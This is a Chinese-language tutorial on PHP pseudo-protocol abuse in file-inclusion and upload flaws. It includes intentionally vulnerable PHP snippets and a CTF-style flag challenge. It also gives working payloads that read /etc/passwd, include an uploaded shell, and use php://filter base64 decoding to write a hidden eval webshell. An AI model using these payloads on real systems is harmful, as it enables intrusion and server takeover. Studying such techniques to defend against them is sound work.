WEB安全--文件上传漏洞--php伪协议的利用
一、伪协议介绍
1.1、内容
在 PHP 中,伪协议通常指的是一种通过特定的 URL 协议方案实现某些特殊功能或行为的方式。伪协议通常并不是标准的协议(如 HTTP、HTTPS),而是由应用程序或开发者自定义的“伪”协议,用于执行某些特定任务。
1.2、各协议条件
| 伪协议 | allow_url_fopen | allow_url_include | 描述及用途 |
|---|---|---|---|
| file:// | ✅ 需开启 | ❌ 无影响 | 访问本地文件:file_get_contents("file:///path/to/file") |
| php://input | ❌ 无影响 | ❌ 无影响 | 读取 HTTP 请求的原始数据流(如 POST 的 body):file_get_contents("php://input") |
| php://filter | ❌ 无影响 | ❌ 无影响 | 流式操作:如 Base64 编码、解码(结合 file:// 读取源码) |
| http:// | ✅ 需开启 | ✅ 需开启 | 远程文件访问或 include(极不安全,建议禁用) |
| https:// | ✅ 需开启 | ✅ 需开启 | 同上 |
| ftp:// | ✅ 需开启 | ✅ 需开启 | FTP 访问文件(极不安全,建议禁用) |
| data:// | ✅ 需开启 | ❌ 无影响 | 直接在脚本中内联数据流(极不安全,建议禁用) |
| zip:// | ❌ 无影响 | ❌ 无影响 | 访问 ZIP 压缩包中的文件(无需开启远程访问) |
二、利用方式
2.1、file://
介绍:
file:// 协议允许通过 PHP 函数访问本地文件。常见函数有:
-
file_get_contents() -
fopen() -
include/require
比如:
// 读取本地文件
echo file_get_contents("file:///etc/passwd");
示例:
1、任意文件读取
$file = $_GET['path'];
echo file_get_contents($file); // 假设某应用支持动态文件读取
http://example.com/vuln.php?path=file:///etc/passwd // payload
2、本地文件包含 (LFI)
$page = $_GET['page'];
include $page; // include 动态文件
http://example.com/vuln.php?page=file:///etc/passwd //payload
3、执行webshell
include "file:///var/www/uploads/shell.php";
2.2、php://input
介绍:
php://input 是 PHP 中的一个伪协议,用于读取原始的 POST 数据。与 $_POST 不同,php://input 不会经过 PHP 的解析器处理,可以获取到未经处理的原始数据流,通常用于接收如 JSON 或 XML 格式的请求体数据。
可以访问请求的原始数据只读流,将POST请求中的数据作为PHP代码执行。
示例:
后端过滤
‹?php
show_source(_FILE_);
include ('flag.php');
$a = $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){
echo "success\n";
echo $flag;
}
else
{
die('no no no');
}可以看到,如果我们想得到flag就得进入第一个判断,那条件是什么呢?
主要就是怎么在传参时满足这个条件:(file_get_contents($a,'r')) === 'I want flag')
普通思路可以想我们直接输入'I want flag'
也就是 127.0.0.1/include.php?a=I want flag
但是这是没有用的,因为服务器目录中没有'I want flag'这个文件,就算有其内容也不是'I want flag'
但是file_get_contents($a,'r')可以接收文件名,也可以接收原始数据流;并且php://input可以接收post传参(数据流式传递)
当file_get_contents()接收到流式数据就不会去找文件名,直接读取数据流内容。
所以payload:
127.0.0.1/include.php/a=php://input
I want flag //同时post传参2.3、php://filter
介绍:
php://filter 能对流式数据进行处理,可以结合 file_get_contents、include、require、fopen 等函数,对目标文件做特定操作,比如:
-
convert.base64-encode:对文件内容进行 Base64 编码
-
convert.base64-decode:对 Base64 内容进行解码
-
string.strip_tags:移除 HTML 标签
-
string.rot13:对内容进行 ROT13 加密
示例:
绕过死亡exit():
<?php
$filename=$_GET['filename'];
$content=$_GET['content'];
file_put_contents($filename,"<?php exit();".$content);
$content在开头增加了exit过程,导致即使我们成功写入一句话,也执行不了。那么这种情况下,如何绕过这个“死亡exit”?
思路其实也很简单我们只要将content前面的那部分内容使用某种手段(编码等)进行处理,导致php不能识别该部分就可以了。
这里的$_GET[‘filename’]是可以控制协议的.
payload:
?filename=php://filter/convert.base64-
decode/resource=1.php&content=aPD9waHAgZXZhbCgkX1BPU1RbYV0pOw==
解析payload:
Base64编码是使用64个可打印ASCII字符(A-Z、a-z、0-9、+、/)将任意字节序列数据编码成ASCII字符串,另有“=”符号用作后缀用途。
base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码
当$content被加上了<?php exit; ?>以后,我们可以使用php://filter/write=convert.base64-decode来首先对其解码。在解码的过程中,字符< ? ; >空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有”phpexit”和我们传入的其他字符。
由于,”phpexit”一共7个字符,但是base64算法解码时是4个byte一组,所以我们可以随便再给他添加一个字符。这样前边的phpexit加上另一个字符就会被base64解码,然后后边的我们精心构造的base64字符串也会被成功解码为php代码。
